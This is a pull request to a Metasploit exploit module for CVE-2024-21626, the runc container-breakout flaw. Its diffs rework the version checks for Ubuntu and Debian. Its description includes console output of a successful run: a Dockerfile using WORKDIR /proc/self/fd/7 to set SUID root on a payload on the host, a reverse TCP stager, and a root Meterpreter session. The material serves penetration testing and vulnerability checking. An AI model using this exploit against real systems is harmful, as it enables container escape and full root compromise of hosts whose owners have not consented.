### PR TITLE
More versions supported, fix bugs, allow Debian. (CVE-2024-21626)

### DIFF
--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -24,7 +24,8 @@ class MetasploitModule < Msf::Exploit::Local
           Due to a file descriptor leak it is possible to mount the host file system
           with the permissions of runc (typically root).
 
-          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 using Docker build.
+          Successfully tested on Ubuntu 22.04 with runc 1.1.7-0ubuntu1~22.04.1 and runc 1.1.11 using Docker build.
+          Also tested on Debian 12.4.0 with runc 1.1.11 using Docker build.
         },
         'License' => MSF_LICENSE,
         'Author' => [
@@ -59,7 +60,7 @@ class MetasploitModule < Msf::Exploit::Local
     register_advanced_options [
       OptString.new('WritableDir', [ true, 'A directory where we can write and execute files', '/tmp' ]),
       OptString.new('DOCKERIMAGE', [ true, 'A docker image to use', 'alpine:latest' ]),
-      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 8 ]),
+      OptInt.new('FILEDESCRIPTOR', [ true, 'The file descriptor to use, typically 7, 8 or 9', 7 ]),
     ]
   end
 
@@ -70,23 +71,41 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     sys_info = get_sysinfo
 
-    unless sys_info[:distro] == 'ubuntu'
-      return CheckCode::Safe('Check method only available for Ubuntu systems')
+    unless sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
+      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
     end
 
-    return CheckCode::Safe('Check method only available for Ubuntu systems') if executable?('runc')
+    # Make sure both docker and runc are present
+    unless command_exists?('runc')
+      return CheckCode::Safe('The runc command was not found on this system')
+    end
+
+    unless command_exists?('docker')
+      return CheckCode::Safe('The docker command was not found on this system')
+    end
 
     # Check the app is installed and the version, debian based example
     package = cmd_exec('runc --version')
     package = package.split[2] # runc, version, <the actual version>
 
+    # Keep sane check for Ubuntu
     if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2
        package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched
        package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched
       return CheckCode::Appears("Vulnerable runc version #{package} detected")
     end
 
-    unless package&.include?('+esm') # bionic patched with 1.1.4-0ubuntu1~18.04.2+esm1 so anything w/o +esm is vuln
+    # These tokens break Rex::Version comparisons.
+    # Some distro runc packages use them for delimiting.
+    bad_tokens = ['+', '~']
+    bad_tokens.each do |token|
+      if package.include?(token)
+        package = package.split(token).first
+      end
+    end
+
+    # From testing, 1.0.0-rc93 < all([1.0.0-rc94, 1.0.0, 1.1.0-rc.1, 1.1.0, 1.1.11])
+    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
       return CheckCode::Appears("Vulnerable runc version #{package} detected")
     end
 
@@ -96,12 +115,12 @@ class MetasploitModule < Msf::Exploit::Local
   def exploit
     # Check if we're already root
     if !datastore['ForceExploit'] && is_root?
-      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+      fail_with(Failure::None, 'Session already has root privileges. Set ForceExploit to override')
     end
 
     # Make sure we can write our exploit and payload to the local system
-    unless writable? base_dir
-      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+    unless writable?(base_dir)
+      fail_with(Failure::BadConfig, "#{base_dir} is not writable")
     end
 
     # create directory to write all our files to
@@ -124,18 +143,23 @@ class MetasploitModule < Msf::Exploit::Local
     register_file_for_cleanup("#{dir}/Dockerfile")
 
     print_status('Building from Dockerfile to set our payload permissions')
-    output = cmd_exec "cd #{dir} && docker build ."
+    output = cmd_exec("cd #{dir} && docker build .")
     output.each_line { |line| vprint_status line.chomp }
 
-    # delete our docker image
-    if output =~ /Successfully built ([a-z0-9]+)$/
+    # delete our docker image (second test created for docker v25.0.3)
+    if output =~ /Successfully built ([a-z0-9]+)$/ || output =~ /writing image sha256:([a-z0-9]+) done$/
       print_status("Removing created docker image #{Regexp.last_match(1)}")
-      output = cmd_exec "docker image rm #{Regexp.last_match(1)}"
+      output = cmd_exec("docker image rm #{Regexp.last_match(1)}")
       output.each_line { |line| vprint_status line.chomp }
+    elsif output.include?("mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory")
+      fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.")
+    else
+      fail_with(Failure::NoAccess, 'Failed to build docker container. The user may not have docker permissions')
     end
 
-    fail_with(Failure::NoAccess, "File Descriptor #{datastore['FILEDESCRIPTOR']} not available, try again (likely) or adjust FILEDESCRIPTOR.") if output.include? "mkdir /proc/self/fd/#{datastore['FILEDESCRIPTOR']}: not a directory"
-    fail_with(Failure::NoAccess, 'Payload SUID bit not set') unless get_suid_files(payload_path).include? payload_path
+    unless setuid?(payload_path)
+      fail_with(Failure::NoAccess, 'Payload SUID bit not set')
+    end
 
     print_status("Payload permissions set, executing payload (#{payload_path})...")
     cmd_exec "#{payload_path} &"

--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -30,6 +30,8 @@ class MetasploitModule < Msf::Exploit::Local
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
+          'SickMcNugget', # Check method enhancements
+          'jheysel-r7', # Check method enhancements
           'Rory McNamara' # Discovery
         ],
         'Platform' => [ 'linux' ],
@@ -40,6 +42,8 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],
           [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],
+          [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2024-21626'],
+          [ 'URL', 'https://ubuntu.com/security/CVE-2024-21626'],
           [ 'CVE', '2024-21626']
         ],
         'DisclosureDate' => '2024-01-31',
@@ -71,9 +75,9 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     sys_info = get_sysinfo
 
-    unless sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
-      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
-    end
+    # unless sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
+    #   return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
+    # end
 
     # Make sure both docker and runc are present
     unless command_exists?('runc')
@@ -84,29 +88,90 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The docker command was not found on this system')
     end
 
-    # Check the app is installed and the version, debian based example
-    package = cmd_exec('runc --version')
-    package = package.split[2] # runc, version, <the actual version>
+    # # Check the app is installed and the version, debian based example
+    # package = cmd_exec('runc --version')
+    # package = package.split[2] # runc, version, <the actual version>
+    #
+    # # Keep sane check for Ubuntu
+    # if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2
+    #    package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched
+    #    package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched
+    #   return CheckCode::Appears("Vulnerable runc version #{package} detected")
+    # end
+    #
+    # # These tokens break Rex::Version comparisons.
+    # # Some distro runc packages use them for delimiting.
+    # bad_tokens = ['+', '~']
+    # bad_tokens.each do |token|
+    #   if package.include?(token)
+    #     package = package.split(token).first
+    #   end
+    # end
+    #
 
-    # Keep sane check for Ubuntu
-    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2
-       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched
-       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched
-      return CheckCode::Appears("Vulnerable runc version #{package} detected")
-    end
+    minimum_version = '1.0.0'
+    version_info = cmd_exec('runc --version')
 
-    # These tokens break Rex::Version comparisons.
-    # Some distro runc packages use them for delimiting.
-    bad_tokens = ['+', '~']
-    bad_tokens.each do |token|
-      if package.include?(token)
-        package = package.split(token).first
+    case sys_info[:distro]
+    when 'ubuntu'
+      version_info =~ /runc version\s+(\d+\S*)/
+      unfiltered_version = Regexp.last_match(1)
+
+      # https://ubuntu.com/security/CVE-2024-21626
+      if sys_info[:version].include? '23.10' # mantic
+        fixed_version = '1.1.7-0ubuntu2.2'
+      elsif sys_info[:version].include? '23.04' # lunar
+        fixed_version = '1.1.7-0ubuntu1'
+      elsif sys_info[:version].include? '22.10' # kinetic
+        fixed_version = '1.1.7-0ubuntu1'
+      elsif sys_info[:version].include? '22.04' # jammy
+        fixed_version = '1.1.7-0ubuntu1~22.04.2'
+      elsif sys_info[:version].include? '20.04' # focal
+        fixed_version = '1.1.7-0ubuntu1~20.04.2'
+      elsif sys_info[:version].include? '18.04' # bionic
+        fixed_version = '1.1.4-0ubuntu1~18.04.2+esm1'
+      elsif sys_info[:version].include? '16.04'  # xenial
+        return CheckCode::Safe('Ubuntu version not affected')
+      elsif sys_info[:version].include? '14.04'  # trusty
+        return CheckCode::Detected('Patch for this Ubuntu version was ignored. (end of standard support)')
+      else
+        fixed_version = '1.1.12'
       end
+      # Replace any "+esm", "ubuntu", "~" or "-" with a "."
+      fixed_version = fixed_version.gsub(/\+[a-zA-Z]+/, '.').gsub(/ubuntu/, '.').gsub(/-/, '.').gsub(/~/, '.')
+      runc_version = unfiltered_version.gsub(/\+[a-zA-Z]+/, '.').gsub(/ubuntu/, '.').gsub(/-/, '.').gsub(/~/, '.')
+    when 'debian'
+
+      # The command runc --version returns a number of different fields, ex:
+      # "runc version 1.1.5+ds1\ncommit: 1.1.5+ds1-1+deb12u1\nspec: 1.0.2-dev\ngo: go1.19.8\nlibseccomp: 2.5.4"
+      #
+      # For Debian the 'version' field doesn't always provide enough accuracy (particularly for Buster) to determine
+      # whether or not the version is vulnerable which is why we extract the 'commit' field as it provides more detail.
+
+      version_info =~ /commit:\s+(\d+\S*)/
+      unfiltered_version = Regexp.last_match(1)
+
+      # https://security-tracker.debian.org/tracker/CVE-2024-21626
+      if sys_info[:version].include? '13' # Trixie (unstable at time of writing 2024-02-28)
+        fixed_version = '1.1.12+ds1-1'
+      elsif sys_info[:version].include? '12' # Bookworm
+        fixed_version = '1.1.5+ds1-1+deb12u1'
+      elsif sys_info[:version].include? '11' # Bullseye
+        fixed_version = '1.0.0~rc93+ds1-5+deb11u3'
+      elsif sys_info[:version].include? '10' # Buster
+        fixed_version = '1.0.0~rc6+dfsg1-3+deb10u3'
+      else
+        fixed_version = '1.1.12'
+      end
+      # Replace any "+deb", "+ds", "~rc", "u" or "-" with a "."
+      fixed_version = fixed_version.gsub(/(?:\+|~)[a-zA-Z]+/, '.').gsub(/u/, '.').gsub('-', '.')
+      runc_version = unfiltered_version.gsub(/(?:\+|~)[a-zA-Z]+/, '.').gsub(/u/, '.').gsub('-', '.')
+    else
+      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
     end
 
-    # From testing, 1.0.0-rc93 < all([1.0.0-rc94, 1.0.0, 1.1.0-rc.1, 1.1.0, 1.1.11])
-    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
-      return CheckCode::Appears("Vulnerable runc version #{package} detected")
+    if Rex::Version.new(runc_version) < Rex::Version.new(fixed_version) && Rex::Version.new(runc_version) >= Rex::Version.new(minimum_version)
+      return CheckCode::Appears("Version of runc detected appears to be vulnerable: #{unfiltered_version}.")
     end
 
     CheckCode::Safe("runc #{package} is not vulnerable")

--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -84,7 +84,7 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The docker command was not found on this system')
     end
 
-    minimum_version = "1.0.0"
+    minimum_version = '1.0.0'
     version_info = cmd_exec('runc --version')
 
     case sys_info[:distro]
@@ -107,9 +107,9 @@ class MetasploitModule < Msf::Exploit::Local
         elsif sys_info[:version].include? '18.04' # bionic
           fixed_version = '1.1.4-0ubuntu1~18.04.2+esm1'
         elsif sys_info[:version].include? '16.04'  # xenial
-          return CheckCode::Safe("Ubuntu version not affected")
+          return CheckCode::Safe('Ubuntu version not affected')
         elsif sys_info[:version].include? '14.04'  # trusty
-          return CheckCode::Detected("Patch for this Ubuntu version was ignored. (end of standard support)")
+          return CheckCode::Detected('Patch for this Ubuntu version was ignored. (end of standard support)')
         else
           fixed_version = '1.1.12'
         end
@@ -150,6 +150,7 @@ class MetasploitModule < Msf::Exploit::Local
     if Rex::Version.new(runc_version) < Rex::Version.new(fixed_version) && Rex::Version.new(runc_version) >= Rex::Version.new(minimum_version)
       return CheckCode::Appears("Version of runc detected appears to be vulnerable: #{unfiltered_version}.")
     end
+
     CheckCode::Safe("runc version #{unfiltered_version} is not vulnerable.")
   end
 

--- a/modules/exploits/linux/local/runc_cwd_priv_esc.rb
+++ b/modules/exploits/linux/local/runc_cwd_priv_esc.rb
@@ -30,6 +30,8 @@ class MetasploitModule < Msf::Exploit::Local
         'License' => MSF_LICENSE,
         'Author' => [
           'h00die', # msf module
+          'SickMcNugget', # Check method enhancements
+          'jheysel-r7', # Check method enhancements
           'Rory McNamara' # Discovery
         ],
         'Platform' => [ 'linux' ],
@@ -40,6 +42,8 @@ class MetasploitModule < Msf::Exploit::Local
         'References' => [
           [ 'URL', 'https://snyk.io/blog/cve-2024-21626-runc-process-cwd-container-breakout/'],
           [ 'URL', 'https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv'],
+          [ 'URL', 'https://security-tracker.debian.org/tracker/CVE-2024-21626'],
+          [ 'URL', 'https://ubuntu.com/security/CVE-2024-21626'],
           [ 'CVE', '2024-21626']
         ],
         'DisclosureDate' => '2024-01-31',
@@ -71,10 +75,6 @@ class MetasploitModule < Msf::Exploit::Local
   def check
     sys_info = get_sysinfo
 
-    unless sys_info[:distro] == 'ubuntu' || sys_info[:distro] == 'debian'
-      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
-    end
-
     # Make sure both docker and runc are present
     unless command_exists?('runc')
       return CheckCode::Safe('The runc command was not found on this system')
@@ -84,32 +84,73 @@ class MetasploitModule < Msf::Exploit::Local
       return CheckCode::Safe('The docker command was not found on this system')
     end
 
-    # Check the app is installed and the version, debian based example
-    package = cmd_exec('runc --version')
-    package = package.split[2] # runc, version, <the actual version>
+    minimum_version = "1.0.0"
+    version_info = cmd_exec('runc --version')
 
-    # Keep sane check for Ubuntu
-    if package&.include?('1.1.7-0ubuntu1~22.04.1') || # jammy 22.04 only has 2 releases, .1 (vuln) and .2
-       package&.include?('1.0.0~rc10-0ubuntu1') || # focal only had 1 release prior to patch, 1.1.7-0ubuntu1~20.04.2 is patched
-       package&.include?('1.1.7-0ubuntu2') # mantic only had 1 release prior to patch, 1.1.7-0ubuntu2.2 is patched
-      return CheckCode::Appears("Vulnerable runc version #{package} detected")
-    end
+    case sys_info[:distro]
+    when 'ubuntu'
+      version_info =~ /runc version\s+(\d+\S*)/
+      unfiltered_version = Regexp.last_match(1)
 
-    # These tokens break Rex::Version comparisons.
-    # Some distro runc packages use them for delimiting.
-    bad_tokens = ['+', '~']
-    bad_tokens.each do |token|
-      if package.include?(token)
-        package = package.split(token).first
+      # https://ubuntu.com/security/CVE-2024-21626
+      if sys_info[:distro] == 'ubuntu'
+        if sys_info[:version].include? '23.10' # mantic
+          fixed_version = '1.1.7-0ubuntu2.2'
+        elsif sys_info[:version].include? '23.04' # lunar
+          fixed_version = '1.1.7-0ubuntu1'
+        elsif sys_info[:version].include? '22.10' # kinetic
+          fixed_version = '1.1.7-0ubuntu1'
+        elsif sys_info[:version].include? '22.04' # jammy
+          fixed_version = '1.1.7-0ubuntu1~22.04.2'
+        elsif sys_info[:version].include? '20.04' # focal
+          fixed_version = '1.1.7-0ubuntu1~20.04.2'
+        elsif sys_info[:version].include? '18.04' # bionic
+          fixed_version = '1.1.4-0ubuntu1~18.04.2+esm1'
+        elsif sys_info[:version].include? '16.04'  # xenial
+          return CheckCode::Safe("Ubuntu version not affected")
+        elsif sys_info[:version].include? '14.04'  # trusty
+          return CheckCode::Detected("Patch for this Ubuntu version was ignored. (end of standard support)")
+        else
+          fixed_version = '1.1.12'
+        end
+        # Replace any "+esm", "ubuntu", "~" or "-" with a "."
+        fixed_version = fixed_version.gsub(/\+[a-zA-Z]+/, '.').gsub(/ubuntu/, '.').gsub(/-/, '.').gsub(/~/, '.')
+        runc_version = unfiltered_version.gsub(/\+[a-zA-Z]+/, '.').gsub(/ubuntu/, '.').gsub(/-/, '.').gsub(/~/, '.')
       end
+    when 'debian'
+
+      # The command runc --version returns a number of different fields, ex:
+      # "runc version 1.1.5+ds1\ncommit: 1.1.5+ds1-1+deb12u1\nspec: 1.0.2-dev\ngo: go1.19.8\nlibseccomp: 2.5.4"
+      #
+      # For Debian the 'version' field doesn't always provide enough accuracy (particularly for Buster) to determine
+      # whether or not the version is vulnerable which is why we extract the 'commit' field as it provides more detail.
+
+      version_info =~ /commit:\s+(\d+\S*)/
+      unfiltered_version = Regexp.last_match(1)
+
+      # https://security-tracker.debian.org/tracker/CVE-2024-21626
+      if sys_info[:version].include? '13' # Trixie (unstable at time of writing 2024-02-28)
+        fixed_version = '1.1.12+ds1-1'
+      elsif sys_info[:version].include? '12' # Bookworm
+        fixed_version = '1.1.5+ds1-1+deb12u1'
+      elsif sys_info[:version].include? '11' # Bullseye
+        fixed_version = '1.0.0~rc93+ds1-5+deb11u3'
+      elsif sys_info[:version].include? '10' # Buster
+        fixed_version = '1.0.0~rc6+dfsg1-3+deb10u3'
+      else
+        fixed_version = '1.1.12'
+      end
+      # Replace any "+deb", "+ds", "~rc", "u" or "-" with a "."
+      fixed_version = fixed_version.gsub(/(?:\+|~)[a-zA-Z]+/, '.').gsub(/u/, '.').gsub('-', '.')
+      runc_version = unfiltered_version.gsub(/(?:\+|~)[a-zA-Z]+/, '.').gsub(/u/, '.').gsub('-', '.')
+    else
+      return CheckCode::Safe('Check method only available for Debian/Ubuntu systems')
     end
 
-    # From testing, 1.0.0-rc93 < all([1.0.0-rc94, 1.0.0, 1.1.0-rc.1, 1.1.0, 1.1.11])
-    if Rex::Version.new(package) >= Rex::Version.new('1.0.0-rc93') && Rex::Version.new(package) <= Rex::Version.new('1.1.11')
-      return CheckCode::Appears("Vulnerable runc version #{package} detected")
+    if Rex::Version.new(runc_version) < Rex::Version.new(fixed_version) && Rex::Version.new(runc_version) >= Rex::Version.new(minimum_version)
+      return CheckCode::Appears("Version of runc detected appears to be vulnerable: #{unfiltered_version}.")
     end
-
-    CheckCode::Safe("runc #{package} is not vulnerable")
+    CheckCode::Safe("runc version #{unfiltered_version} is not vulnerable.")
   end
 
   def exploit


### PR DESCRIPTION
updates #18780  

Uses the Ubuntu version checking, with a fallback to the Rex::Version system to check the runc version. The old system used to allow runC version 1.1.12 (which is patched). Now it allows from 1.0.0-rc93->1.1.11 (and I tested that it works as expected). Support added for Debian as this was tested with both Debian and Ubuntu. Newer versions of Docker wouldn't delete the built container due to the message format. I added a new regex to check for the message format which now deletes containers.

Fixed error reporting bug, runC version sanitising
Some runC versions contain the `+` and `~` token. These break Rex::Version objects. A simple check was added against these symbols and anything following them is cut off. Another solution may be to replace these tokens with the `-` symbol to maintain information. One of the failure cases was unreachable and this was fixed.

Fix runC and docker presence checks
The old runC and docker presence checks wer using `if` instead of `unless`. executable? also requires a full path to work correctly. Since only the command names themselves were being passed in, the check was silently failing. The chosen fix was to instead use the command_exists? function, which has the added benefit of working on both Windows and Linux.

## Verification
- [ ] Start msfconsole
- [ ] use exploit/linux/local/runc_cwd_priv_esc
- [ ] set SESSION
- [ ] set LHOST
- [ ] run
- [ ] root shell acquired
- [ ] Docker container deleted
## Output
- Regardless of whether ForceExploit was true or false, runC version 1.1.12 used to be treated as vulnerable, which this fixes.
- Containers were not being deleted due to the output from docker engine below not meeting the regex expectations.
- FD 7 has always been the correct descriptor so far in my experience, so I have set it as default.
### runC check
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. runc 1.1.12 is not vulnerable "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
```
### Valid run
```
msf6 exploit(linux/local/runc_cwd_priv_esc) > run session=1 lhost=192.168.20.24 verbose=true

[*] Started reverse TCP handler on 192.168.20.24:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable runc version 1.1.11 detected
[*] Creating directory /tmp/.jwBZNB
[*] /tmp/.jwBZNB created
[*] Uploading Payload to /tmp/.jwBZNB/.cleXu7
[*] Uploading Dockerfile to /tmp/.jwBZNB/Dockerfile
[*] Building from Dockerfile to set our payload permissions
[*] #0 building with "default" instance using docker driver
[*] 
[*] #1 [internal] load build definition from Dockerfile
[*] #1 transferring dockerfile: 217B done
[*] #1 DONE 0.0s
[*] 
[*] #2 [internal] load metadata for docker.io/library/alpine:latest
[*] #2 DONE 3.5s
[*] 
[*] #3 [internal] load .dockerignore
[*] #3 transferring context: 2B done
[*] #3 DONE 0.0s
[*] 
[*] #4 [1/3] FROM docker.io/library/alpine:latest@sha256:c5b1261d6d3e43071626931fc004f70149baeba2c8ec672bd4f27761f8e1ad6b
[*] #4 DONE 0.0s
[*] 
[*] #5 [2/3] WORKDIR /proc/self/fd/7
[*] #5 CACHED
[*] 
[*] #6 [3/3] RUN cd ../../../../../../../../ && chmod -R 777 tmp/.jwBZNB && chown -R root:root tmp/.jwBZNB && chmod u+s tmp/.jwBZNB/.cleXu7
[*] #6 DONE 0.3s
[*] 
[*] #7 exporting to image
[*] #7 exporting layers 0.0s done
[*] #7 writing image sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959 done
[*] #7 DONE 0.1s
[*] Removing created docker image 6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Deleted: sha256:6681b1ed9c5ae723c2d854c1366aa86837d136030aeea3e63d6255fe8d405959
[*] Payload permissions set, executing payload (/tmp/.jwBZNB/.cleXu7)...
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.20.25
[+] Deleted /tmp/.jwBZNB/.cleXu7
[+] Deleted /tmp/.jwBZNB/Dockerfile
[+] Deleted /tmp/.jwBZNB
[*] Meterpreter session 2 opened (192.168.20.24:4444 -> 192.168.20.25:43178) at 2024-02-07 01:00:02 -0500

meterpreter > getuid
Server username: root
meterpreter > sysinfo
Computer     : 192.168.20.25
OS           : Debian 12.4 (Linux 6.1.0-17-amd64)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
```